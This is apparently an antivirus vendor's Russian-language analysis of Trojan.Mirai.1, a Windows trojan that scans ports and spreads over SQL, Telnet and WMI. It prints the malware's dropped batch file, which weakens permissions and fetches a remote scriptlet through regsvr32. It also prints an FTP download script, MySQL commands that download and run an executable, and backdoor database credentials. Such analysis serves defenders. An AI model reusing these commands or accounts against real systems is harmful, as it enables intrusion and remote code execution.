Trojan.Mirai.1

SHA1:

• 9575d5edb955e8e57d5886e1cf93f54f52912238
• f97e8145e1e818f17779a8b136370c24da67a6a5
• 42c9686dade9a7f346efa8fdbe5dbf6fa1a7028e
• 938715263e1e24f3e3d82d72b4e1d2b60ab187b8

Троянец для ОС Microsoft Windows, написанный на С++. Предназначен для сканирования TCP-портов в заданном диапазоне IP-адресов с целью выполнения различных команд и распространения другого вредоносного ПО.

При запуске троянец соединяется со своим управляющим сервером, скачивает оттуда конфигурационный файл (wpd.dat), расшифровывает его и извлекает список IP-адресов. Затем запускается сканер, обращающийся к адресам по списку и опрашивающий сразу несколько портов. Троянец может обращаться к следующим портам:

 * 22
 * 23
 * 135
 * 445
 * 1433
 * 3306
 * 3389

Флаги запуска:

-syn - использовать сканирование в режиме Tcp_Syn вместо Tcp_connect
-log - записать информацию в файл журнала
-see - отобразить окно консоли
-srv - запустить как сервер
-cli - запустить как клиент
-start, -stop, -create, -delete - управление сервисом
-run – запустить троянца как приложение, не в качестве сервиса
-s - запустить троянца как сервис

При успешном подключении к удаленному узлу по любому из используемых им протоколов кроме RDP троянец выполняет набор команд, указанный в конфигурационном файле. При подключении по протоколу Telnet к устройству, работающему под управлением Linux, загружает на него бинарный файл, который в свою очередь скачивает и запускает троянца Linux.Mirai.

При подключении с использованием WMI запускает в удаленной системе процессы с использованием метода Win32_Process.Create. С использованием IPC может напрямую отправлять удаленному узлу IPC-команды.

При подключении к удаленному серверу MS SQL создает файл С:\windows\system32\wbem\123.bat следующего содержания:

@echo off
mode con: cols=13 lines=1
cacls C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll /e /g system:f&cacls C:\\windows\\system32\\cacls.exe /e /g system:f&cacls C:\\windows\\system32\\cmd.exe /e /g system:f&cacls C:\\windows\\system32\\ftp.exe /e /g system:f&cacls C:\\windows\\system32\\rundll32.exe /e /g everyone:f
taskkill /f /im regsvr32.exe&taskkill /f /im rundll32.exe
regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll&regsvr32 /s jscript.dll&regsvr32 /s vbscript.dll&regsvr32 /s scrrun.dll&regsvr32 /s WSHom.Ocx&regsvr32 /s shell32.dll
attrib +s +h *.bat
start regsvr32 /u /s /i:http://*****.com:280/v.sct scrobj.dll
if exist c:\\windows\\debug\\item.dat start rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa
exit

Создает файл PerfStringse.ini следующего содержания:

[Version]
signature=$CHICAGO$
[File Security]
1=c:\\windows\\system32\\cmd.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\ftp.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\cacls.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\regsvr32.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\icacls.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\net1.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)

Создает файл c:\windows\systemmyusa.dvr следующего содержания:

open down.f321y.com
mssql
1433
get 1.dat c:\\windows\\system\\myusago.dvr
get 1.bat c:\\windows\\system\\backs.bat
bye

Также создает пользователя СУБД с логином Mssqla и паролем Bus3456#qwein, присваивает ему привилегии sysadmin. От имени этого пользователя при помощи службы SQL server job event автоматически выполняются различные задачи.

При подключении к удаленному серверу MySQL создает пользователя с именем phpminds и паролем phpgod, присваивает ему следующие привилегии:

select
insert
update
delete
create
drop
reload
shutdown
process
file
grant
references
index
alter
show_db
super
create_tmp_table
lock_tables
execute
repl_slave
repl_client
create_view
show_view
create_routine
alter_routine
create_user
event
trigger
create_tablespace

Создает в папке C:\Windows\System32\ динамическую библиотеку и импортирует из нее функции. Выполняет следующие MySQL-команды:

SELECT downa("http://*****.com:280/mysql.exe","c:\\windows\\system32\\ser.exe");
SELECT cmda("C:\\windows\\system32\\ser.exe");

Новость о троянце